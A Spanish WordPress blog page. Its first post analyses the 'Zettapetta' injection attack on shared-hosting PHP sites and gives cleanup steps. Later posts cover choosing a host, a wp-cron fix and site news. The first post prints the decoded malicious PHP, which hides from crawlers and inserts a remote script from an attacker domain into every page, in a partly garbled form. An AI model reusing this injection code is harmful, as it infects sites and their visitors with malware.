Zettapetta: Nuevo ataque a servidores compartidos

Desde hace unos días hay nuevas noticias de ataques a sitios que estén basados en PHP, como lo está WordPress, y hoy ya puedo dar indicaciones algo claras al respecto, perdonad el retraso no obstante.

Lo primero a aclarar es que no es un ataque masivo a WordPress, sino que esta inyección de código afecta a cualquier web basada en PHP y, a día de hoy, el otro dato relevante es que además compartan servidor, no está pasando en servidores dedicados. De hecho, si fuera un ataque masivo a WordPress habría muchos más sitios infectados, dado la enorme implantación que a día de hoy (gracias a vosotros) tiene este CMS.

Esto nos hace pensar en dos posibles causas, una segura. La primera es que el atacante utiliza vulnerabilidades de seguridad del servidor en el que está alojado y que comparte con otros sitios, y la segunda que algo está permitiendo que el código se inyecte en los ficheros PHP de los sitios atacados, ya sea un plugin mal diseñado, una mala configuración de seguridad del CMS utilizado. No obstante yo apuesto por la primera opción porque el Zettapetta este ha infectado sitios estáticos en donde había un par de ficheros PHP sueltos y, como ya he dicho, si fuera algo especial para WordPress estaríamos todos infectados, o casi, y no es así.

Este caso es especialito, porque incluso hay un vídeo en el que el supuesto causante explica como inyectar código en servidores compartidos de Networks Solutions ¡sin tener que robar nombres de usuario y/o contraseñas!

Afortunadamente hay solución.

Los atacantes están infectando las webs con un script que trata de inyectar software malicioso a los sitios "cliente" y, además, evita que los mecánismos anti-malware que incluyen los modernos navegadores como Firefox y Safari puedan detectarlo.

El script afecta a cualquier servidor compartido, y ya se han comprobado ataques en varios proveedores de hosting de primer nivel, como Mediatemple.

En los sitios atacados se insertaba este javascript:

http://www.indesignstudioinfo.com/ls.php

http://zettapetta.com/js.php

Y lo que hace el Zettapetta este de las narices es añadir un montón de código en base64 al principio de todos los ficheros PHP que se encontrara en el servidor, recursivamente. Vamos, que si entra en tu WordPress infecta todos los ficheros 'core', los de los plugins, los temas, todo, hasta el wp-config.php y los index.php habitualmente vacíos.

Una vez descodificado el base64 lo que contiene es esto:

PHP:
  1. if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return base64_decode("<script src="http://indesignstudioinfo.com/ls.php"></script>"); } return ""; } } if(!function_exists('gzdecode')){ function gzdecode(<script src="http://indesignstudioinfo.com/ls.php"></script>){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }

El bicho tiene tela así que a limpiar se ha dicho … 

Lo primero es probar el hack que han elaborado en Securi.net. Descargas este archivo a tu escritorio:
http://sucuri.net/malware/helpers/wordpress-fix_php.txt y lo renombras a wordpress-fix.php

Una vez hecho esto lo subes a tu sitio por FTP y lo ejecutas desde el navegador. O sea: http://miweb.com/wordpress-fix.php

El script tarda unos minutos en completarse ya que escanea todo tu sitio y quita las entradas de malware, recursivamente también.

Cuando termine puedes borrar el archivo y, a continuación, para asegurar que dejas todo limpio, seguir estas indicaciones, las de siempre:

  • Exporta todo tu contenido mediante la utilidad de exportación de WordPress y guarda la carpeta wp-content así como cualquier otra que utilices de modo manual. Revisa tu tema, plugins y carpetas de uploads, etc, antes de darlos por seguros.
  • Revisa el fichero wp-config.php para eliminar cualquier posible inyección de código, cambia los permisos a 644 o, mucho mejor, carga un wp-config.php totalmente limpio.
  • Cambia todas las contraseñas: ftp, base de datos. Usa contraseñas fuertes, usando caracteres alfanuméricos y símbolos
  • Como el problema afecta a la base de datos hay que descartarla. Borra la actual y crea una nueva o, en su defecto, revisa cada una de las tablas
  • Borra todo el contenido de la instalación actual de WordPress (recuerda que antes has hecho backup)
  • Instala un WordPress limpio (última versión), usando la información de la nueva base de datos recién creada
  • Carga tu carpeta wp-content de nuevo, una vez comprobado que todo está limpio
  • Importa los posts de tu sitio que exportaste con la utilidad de importación de WordPress
  • Configura tu WordPress de manera segura siguiendo las instrucciones de los enlaces facilitados

¡Que el backup te acompañe!

Contenido exclusivo para suscriptores al Feed

¡Gracias por seguirnos a diario!. Premiamos tu fidelidad ofreciéndote habitualmente contenidos exclusivos. Hoy puedes descargar:

Clic aquí para iniciar la descarga Guía para Administrar Wordpress

¿Te gustó este post? ¡Compártelo! Bitacoras.com TwitThis Facebook Meneame Google Bookmarks del.icio.us Live Technorati Ping.fm Wikio Turn this article into a PDF! E-mail this story to a friend! Print this article!

Como elegir un buen Hosting para WordPress

Si decides alojar WordPress en tu propio servidor te vas a encontrar con un buen montón de ofertas por todas partes de empresas de alojamiento y es difícil, sobre todo la primera vez que contratas un hosting, elegir uno que sea adecuado a tu economía y que, al tiempo, sea adecuado para instalar WordPress y, quien sabe, incluso bbPress.

wordpress-hosting

Además, el mundo del negocio de los hosting es muy competitivo y encontrarás todo tipo de ganchos con los que te van a tratar de convencer de que sus planes de alojamiento son los mejores. Y debes elegirlo bien, pues las migraciones posteriores siempre es mejor evitarlas aunque migrar WordPress no sea tan complicado como parece. No es que te debas plantear un hosting para toda la vida pero mejor si aciertas desde el principio con uno que tenga lo que necesitas y te ofrezca calidad.

Para empezar vas a necesitar conocer algunos conceptos o convenciones que suelen utilizar para convencerte, y que debes saber de que te están hablando o porqué debes considerarlos:

El Mejor Precio – Nunca tengas en cuenta este factor a priori, el precio tiene que estar relacionado con las prestaciones, y lo que en principio puede parecer un importe mínimo puedes encontrarte que luego debas añadir extras que lo conviertan en el mas caro.

El País – No es algo que se debe desestimar. Los mejores precios siempre los encontraremos en servidores de los U.S.A. pero tanto por posicionamiento en tu país, como por soporte técnico, es bueno buscar primero en proveedores de hosting de tu país. Es importante tener un teléfono a quien llamar en tu idioma en caso de necesidad.

Donde se alojan los BlogStars – Esto tampoco debe ser para ti un “leif motiv”. Ten en cuenta que los sitios mas famosos, y en consecuencia con mas tráfico, no suelen tener contratos tipo, de los que tu vas a tener acceso. Te puede ofrecer garantías en algún caso porque “¡leche, si allí se aloja Ayuda WordPress no creo que se caiga cada dos por tres!“, pero no te fíes de eso. Ni siquiera este blog tiene un plan normal, nuestro alojamiento en CDmon es un hosting patrocinado, y el proveedor se cuida muy mucho de que no se caiga nunca, pues es argumento de venta para ellos. No es que no esté contento, ya sabes que siempre los he recomendado y solo cambié de hosting a Mediatemple por el asunto del precio, pero no debe ser argumento para ti la mayoría de las veces. Hay casos incluso mas llamativos, pues sitios como Techcrunch tienen planes personalizados, con gente vigilando sus servidores 24 horas, nada a lo que tengamos acceso el común de los mortales.

Reseller – Un reseller es una empresa que revende servicios de alojamiento de otra empresa mayor, normalmente a costa de prestaciones pero en ocasiones aportando también beneficios. En realidad es una subcontrata, por lo que es difícil que un reseller se haga responsable de caídas de servidores – siempre tiene a quien echar la culpa – pero a cambio puede ofrecerte soporte en tu idioma. En cualquier caso no los recomiendo pues es un mundillo en el que hay mucho piratón que ofrecen el oro y el moro para luego entregarte un servicio penoso, de principiantes a principiantes. Verás ofertones tremendos pero desconfía, en ocasiones te meterán publicidad en tu blog, otras veces simplemente no tienes garantías y en el peor de los casos incluso pueden quedarse con tu dinero y no ofrecerte nada. No digo que no haya resellers serios, solo que es difícil distinguirlos de los muy malos, no te puedes fiar ni de las recomendaciones de “usuarios felices”, en muchas ocasiones amigos del reseller que lo promocionan a cambio de unos dólares. Ya te digo que es un mundillo para cogerlo con pinzas.

Tiempo de Uptime – Este suele ser uno de los grandes argumentos de venta (después del precio), y se refiere al tiempo total de servicio prestado, el tiempo en que un ordenador está funcionando sin apagarse, colgarse (no olvides que un servidor es un ordenador – remoto pero ordenador). Nadie te va a ofrecer un 100%, y si te lo ofrece huye es mentira. Pero si te vas a encontrar a muchos con el argumento de 99,9%, que es lo mismo que decirte que si tu blog está caído eres el tonto al que le ha tocado el 1% de caída.

Espacio en disco – Que este valor nunca influya en tu decisión. Una instalación de WordPress ocupa poco mas de 20 Mb, y solo tus necesidades de alojamiento de imágenes o vídeos deberán influir en tus necesidades de espacio. Además, siempre puedes alojar tus imágenes en sitios gratuitos y, por supuesto, no subas los vídeos a tu servidor, usa servicios como Blip.tv o YouTube, no se van a caer nunca y no te cuestan dinero. Vamos, que con 1 Gb vas a tener mas que de sobra la mayoría de las veces, al menos para empezar.

Tasa de transferencia – Este si que es un valor importante, pues la tasa de transferencia es la cantidad de datos que tu proveedor de hosting te va a permitir transferir mensualmente por su red. A mayor tráfico y visitas mas tasa de transferencia necesitarás. Para empezar con 1 Gb te irá bien pero valora si tu proveedor te permite aumentarla a menudo que la vayas necesitando … y a unos precios razonables y sin cambiar de plan. Es difícil valorar las necesidades de transferencia que vamos a tener, pero ten en cuenta que crecerán. Cuantas mas imágenes alojes mas necesitarás, cuantas mas visitas tengas mas necesitarás. Calcula una relación de 1 a 3, o sea, para 1.000 visitantes diarios, 3 Gb de transferencia, pero ya te digo que influyen muchos factores, como el hotlinking.

Peticiones – Este es un valor que los proveedores no suelen indicar casi nunca en sus ofertas y suele ser uno de los que mas disgustos dan. Por peticiones debes entender el consumo de CPU del ordenador donde tienen alojado tu página. Ten en cuenta que la mayoría de los planes a los que tendrás acceso en un principio serán compartidos, lo que significa que los recursos del servidor tienen que repartirlos entre 15, 25, 50 y hasta 100 páginas de clientes. De nada te sirve tener mucha tasa de transferencia (canuto de tráfico de datos en red) si el servidor se cae o te limitan el uso de CPU a un 2%, por decir algo. Aquí entra mucho el abuso de algunas empresas de hosting, que pretenden, por usar una analogía, ejecutar 100 aplicaciones tipo Photoshop en un solo ordenador, y claro, luego llegas tu queriendo ejecutar Picasa y se cae. Hay mucho engaño en este asunto y poca transparencia. Lo mejor para ir sobre seguro es saber cuantos sitios se comparten en cada alojamiento, cosa harto difícil aunque hay herramientas.

Recursos Ilimitados – Si algún proveedor te ofrece espacio en disco, transferencia, o lo que sea “ilimitado” huye como de la peste: ¡Es mentira!, y no se puede empezar una relación con mentiras ¿no crees?. Nadie regala ni discos duros, no conexión a Internet ni ordenadores. Este tipo de ofertas siempre tendrán letra pequeña y son simplemente “ganchos” de venta. Así que no, ¡no hay nada ilimitado!.

¿Nos tomamos un respiro?

cafe-usb


Venga, seguimos con lo que debemos saber para contratar un hosting para WordPress. Nos habíamos quedado en los “recursos ilimitados”, ahora vamos a ver como se reparten esos recursos y mas cosas …

Alojamiento compartido – Es la opción mas común, mas barata y mas recomendable en principio. Compartes máquina (servidor) con mas sitios, no tienes acceso a funciones avanzadas pero a cambio si algo va mal en el servidor se ocupa tu proveedor. Ten en cuenta los dos puntos anteriores.

VPS – Un Virtual Private Server es el modo de decir que tienes acceso a tu alojamiento como si estuvieras delante del ordenador, accediendo a sus recursos y con la posibilidad de gestionarlos a tu manera. En realidad es un alojamiento compartido pero que gestionas como si fuera tu propia máquina exclusiva. Piensa en ello como acceder a tu cuenta en tu ordenador de Linux con derechos de Administrador, pero no absolutos, sin acceso root (a veces si lo tienes) ni a toda la máquina, solo a los recursos asignados. Este tipo de alojamientos son siempre mas caros que los compartidos pero a cambio controlas mas tus recursos y tu alojamiento. Solo son recomendables si tienes conocimientos de gestión de servidores y de Linux. Además, debes tener en cuenta que ya no vas a poder recurrir tan a menudo a tu proveedor pues tu gestionas tu servidor. Como regla básica podríamos decir que un VPS con pocas prestaciones es siempre peor y mas caro que un buen alojamiento compartido.

Servidor Dedicado – Básicamente, lo que tienes es un servidor para ti solito, como si tuvieras tu blog alojado en el ordenador de tu casa pero con una conexión a Internet mejor (no siempre). Solo interesa si tu tráfico demanda tales recursos y tienes conocimientos avanzados de Linux y gestión de servidores. El proveedor te ofrecerá máquinas con distintas prestaciones de RAM, CPU, etc y tu te ocupas de instalar el software, actualizarlo y solucionar cualquier problema que no sea de hardware. Suele venir con software preinstalado, al menos el básico.

SSH – O Secure Shell, es un modo de interactuar con tu alojamiento mediante interfaz de comandos, a través del terminal. Como tu alojamiento será Linux puedes ejecutar comandos shell sobre tu servidor para instalaciones, mover ficheros, lo que quieras. Si tienes experiencia con sistemas Unix es una opción muy interesante a tener en cuenta, y si tu proveedor te lo ofrece aprécialo, aunque solo suele estar disponible para servidores dedicados y VPS.

Bases de datos MySQL – Esta prestación es imprescindible para usar WordPress (y la mayoría de los CMS) así que debe tenerlo tu plan de alojamiento. No hace falta que te ofrezcan muchas, con una sola base de datos puedes tener varias instalaciones de WordPress, incluso WordPress Mu.

PHPmyAdmin – Es una aplicación de gestión de bases de datos MySQL muy capaz, con la que acceder a las tablas de tus bases de datos, optimizarlas, importar, exportar y muchas mas operaciones. Debe ser un básico que debes exigir. Hay proveedores que te ofrecerán utilidades en sus paneles de control (CDmon tiene una pequeña maravilla para importar bases de datos grandes que vale su peso en oro) pero siempre debes tener acceso a tus bases de datos mediante PHPmyAdmin. Si sigues nuestros tutoriales ya sabrás que su uso te puede solucionar bastantes papeletas difícilmente manejables por otros medios.

PHP – Que la versión sea la 5.x, evita versiones 4.x o anteriores. Es otro básico que debe tener tu servidor.

FTP – Es imprescindible que tengas acceso mediante FTP a tu alojamiento, si tu proveedor no te lo ofrece descártalo directamente. Por supuesto, hay sistemas de instalación automática de WordPress pero necesitas acceso FTP para actualizaciones, modificaciones o simplemente para tener control absoluto de tu alojamiento, tu espacio.

Fantástico – Los autoinstaladores de CMS, como Fantástico, son una opción para usuarios que quieren “probar” un CMS pero no para quien tiene claro que CMS instalar. En tu caso no lo uses. Suelen instalar versiones antiguas de WordPress y además suelen ser problemáticas las actualizaciones posteriores. Evítalo e instala WordPress por tu cuenta, es fácil.

CPanel o Plesk – Estos nombres que vas a ver mucho son aplicaciones, paneles de control para gestionar tu alojamiento desde la página de tu proveedor. Como para gustos hay colores a cada usuario le gusta mas un sistema u otro, pero debes saber que ambos son igual de sencillos de utilizar. Es casi mas importante que dispongas de la interfaz en español que la elección de uno u otro, te vas a acostumbrar y ambos son fáciles de usar. No debe influir en tu elección salvo que estés muy muy muy acostumbrado a un panel. Es mas, algunos proveedores ni siquiera usan estos paneles sino uno propio, en algunos casos incluso mejores. (¿cual me gusta mas a mi?, Plesk y el panel propio de CDmon, el mejor que he visto)

¿Linux o Windows? – Siempre usa planes Linux, no porque sean mas baratos sino porque te aseguras compatibilidad con WordPress, PHP, MySQL y mucho mas software Open Source. Los planes Windows están basados en Windows IIS (los Linux en Apache) y solo son necesarios para sitios que usen ASP.NET.


hosting

Pues, aunque parezca mucho, estos son los básicos, pero hay mas asuntos a tener en cuenta, si es que sigues ahí. Ya terminamos …

Yo he pasado todo tipo de experiencias, desde las muy buenas hasta las muy malas, pero a la hora de elegir un alojamiento, para mi o para un cliente, en el que alojar WordPress, he llegado a la conclusión de que hay que tener en cuenta otros dos conceptos en cuanto a los aspectos mas técnicos:

SafeMode – Debes asegurarte de que tu servidor no tenga activado el conocido como ‘safemode‘ de PHP, pues es un impedimento para el funcionamiento adecuado de varios plugins. Normalmente te dirán que no lo tienen activo por motivos de seguridad pero hay maneras de mejorar la seguridad de un servidor que no pasan por el Safemode. Al menos que te permitan desactivarlo, bien por tu cuenta o que lo puedan hacer ellos. Igualmente, puede que necesites tener activa la directiva alow_url_fopen, al menos infórmate de esta posibilidad. Nota: en un VPS o dedicado este tipo de cosas las gestionas tu mismo

NFS – El conocido como Network File System, utilizado por mas proveedores de hosting de los que imaginas, es un modo, mediante software, de ofrecer ese almacenamiento “ilimitado” del que hablábamos anteriormente, pero en realidad lo que consigues es que se ralentice la lectura de archivos. Lo que hace es repartir dinámicamente el espacio en disco de toda la red según necesidades pero siempre es mas lento que el almacenamiento local.

Bueno, y hasta aquí este tutorial. Espero que no te haya resultado muy pesado, y sino siempre puedes guardarlo en tus favoritos para tenerlo por ahí como referencia. Por supuesto, si quieres aportar alguna experiencia o recomendación lo puedes hacer en los comentarios, que para eso estamos.

Imagino que llegado a este punto te surgirá la inmediata pregunta: “¿que hosting que cumpla todo eso conoces?“. Pero me permitirás que no conteste, este post no está patrocinado ni nada parecido a pesar de haber comentado alguna experiencia propia, y además solo la experiencia te dirá cual es el mejor proveedor de alojamiento, esta guía solo pretende dar unas pautas a tener en cuenta a la hora de elegir. También debes tener en cuenta que cada país es un mundo, y seguramente en el tuyo haya muchas y buenas empresas que cumplan y sepan ofrecerte un gran servicio.

¿Te gustó este post? ¡Compártelo!

TwitThis
Facebook
Bitacoras.com
del.icio.us
Google
Live
Meneame
StumbleUpon
Technorati
Digg
Tumblr
Wikio
Envía este post por E-mail a un amigo
Imprime este artículo

Posts programados que no se publican

Hace bastante tiempo tuve problemas con los posts programados (ayer mismo hablábamos de este asunto). Suelo escribir según tengo el día de inspirado y no siempre publico todo el mismo día. Aquí por ejemplo, en Ayuda WordPress, suelo programar muchos posts para poder ofrecer siempre al menos un truco o guía al día, luego además publico todo aquello que sea actualidad rabiosa.

posts-programados

Pues bien, a lo que iba, tras la migración inicial de Mayo comprobé que los posts programados no terminaban de publicarse nunca, cuando llegaba la hora en que tenían que salir a la luz empezaban como un bucle infinito en el que cada vez subía el contador de tiempo que faltaba para que se publicara el post en cuestión.

Y, tras mucho investigar, di con la solución que, por supuesto, tenía que ver con algo raro que pasó en la migración. Cuando lo descubrí lo compartí en los foros de soporte de Mediatemple, pero hoy he caído en que nunca lo comenté aquí, craso error que ahora voy a solucionar.

Bien, pues el asunto es que es algo que tiene que ver con el archivo ‘wp-cron.php‘ y la configuración del servidor …

LA SOLUCIÓN

  1. Teclea el siguiente comando a través de SSH (por supuesto, debes tener acceso a tu servidor por este medio)
    wget http://tudominio.com/wp-cron.php

    Si todo está bien verás un mensaje de “OK”. Pero si hay problemas verás un feo mensaje de error 404 en la ventana del terminal. Si tienes esta mala suerte debes seguir estos pasos …

  2. Abre tu fichero ‘etc/hosts
  3. Observa si la DNS a que apunta no es la dirección DNS de tu dominio (p.ej.: si la DNS de tu domino es 75.38.40.200 y el fichero de hosts apunta a 125.0.0.3)
  4. Cambia la DNS errónea en el fichero ‘etc/hosts‘ a la DNS real de tu dominio
  5. Comprueba de nuevo si tu fichero ‘wp-cron.php‘ funciona correctamente tecleando lo mismo de antes …
    wget http://tudominio.com/wp-cron.php

    Si obtienes un “OK” ya lo tienes

También, por supuesto, te puedes encontrar en la situación en que no tengas acceso vía SSH. En ese caso siempre puedes pedir al servicio técnico de tu alojamiento que hagan esta comprobación, para eso pagas ¿no?.

¿Te gustó este post? ¡Compártelo!

TwitThis
Facebook
Bitacoras.com
del.icio.us
Google
Live
Meneame
StumbleUpon
Technorati
Digg
Tumblr
Wikio
Envía este post por E-mail a un amigo
Imprime este artículo

Ayuda WordPress – 1 Año de vida

aniversario-ayudawp

Hoy cumple 1 año de vida Ayuda WordPress, desde aquel 26 de Diciembre de 2.007 en que Guillermo y un servidor empezamos esta tarea de forjar una comunidad WordPress de habla hispana. El objetivo y motivación permanente es ofrecer al menos un truco, guía, plugin o theme diario, y además la información relevante de cada día sobre WordPress y todo su ecosistema. Creo que lo hemos conseguido y no hemos desfallecido ni un día. Y, en este primer aniversario, hay algunas cosas que compartir y que son ya parte de la historia de Ayuda WordPress:

Ha habido muchos mas días interesantes, pero lo que toca son los agradecimientos:

  • A Guillermo por sacar tiempo de donde no lo tenía
  • A Francisco por cuidar esta casa como si fuera la suya
  • A Andrés Nieto por estar siempre ahí para ayudar y enseñarnos.
  • A David por el logo, las ayudas con el theme y su amistad.
  • A Hector por su apoyo incondicional.
  • A lalaale por estar siempre ahí.
  • A Mno4K por ser el alma del foro
  • A Neri por sus grandes aportaciones y estar al quite cuando hizo falta (hoy incluso)
  • A Skavenger, zzamov, Prebon, Pacog00, Juan Antonio, jmarior, Jh®, ejner69, Fonte, hades87 y Lolete por sus contribuciones, por compartir su conocimiento en estas páginas.
  • A los lectores de Ayuda WordPress, por estar siempre ahí participando y proponiendo nuevas ideas
  • A CDmon por regalarnos el hosting
  • A Luis Rull por ser una gran persona y mejor profesional
  • Al equipo de Automattic por ofrecer el mejor CMS posible

Y se me quedan muchos, espero me perdonen por mi mala cabeza. A todos vosotr@s ¡Gracias!

Comparte este post:

TwitThis
Facebook
Digg
del.icio.us
Google
Live
Meneame
StumbleUpon
Technorati
Tumblr
Wikio
Envía este post por E-mail a un amigo
Imprime este artículo

Migrando que es gerundio – Agarrarse que hay curvas

peces-mudanza

Durante el fin de semana voy a migrar Ayuda WordPress a un servidor mayor (bastante mayor), con recursos – espero que – casi ilimitados, si es que esto existe, todo gracias a una oferta de patrocinio de CDmon, por lo que dejaremos de usar Mediatemple para Ayuda WordPress (no así para otros sitios que me dan menos quebraderos de cabeza), y de paso ganamos en velocidad, soporte técnico (ya no me tendré que ocupar yo del servidor) y, en consecuencia, tiempo para poder publicar mas y mejor.

servidor-mayor

Esto significa que puede que veáis cosas raras en algún momento del fin de semana, o alguna redirección temporal extraña que procuraré que sea corta. Esto mismo afectará igualmente al Foro, y los sitios de pruebas que tenemos: themes, wordpress 2.7, wordpress 2.6 y habari. La parte que creo que será mas complicada es la del foro, pues ahí estoy bastante verde y no se si haré una escabechina, que espero que no. En Ayuda WordPress voy a aprovechar la migración para darle unos retoques a la base de datos – que venía pidiendo hace tiempo -, borrado de plugins que probamos en su día y ya no usamos o no son necesarios para los posts, y alguna cosilla mas que ya os contaré.

No obstante, avisaré cuando estemos en el nuevo servidor, y a partir de ahí os pediré que me echéis un cable para saber si todo va bien, si se ha perdido algún comentario o esas cosillas que pueden pasar en las migraciones, y mas esta que es de bastante volumen y características de la misma. Solo espero que esta sea la última migración (ya es la segunda en menos de un año), y que a partir de ahora este asunto de los recursos deje de ser una preocupación y falta de horas de sueño para mi, y que Ayuda WordPress vaya como un tiro, con lo que ganéis todos.

mudanza-web

Optimizar: Mejorar Rendimiento y Carga web de un Blog

Muchos habrán recibido alguna vez una notificación de su hosting por abusos en el consumo de ram, procesos, etc. Puede que te interese leer como optimizar el uso de memoria ram, reducir el uso de CPU y memoria de servidor, optimizar la base de datos, y mejorar la velocidad del blog. También puedes considerar cambiarte a un hosting con servidor virtual/dedicado.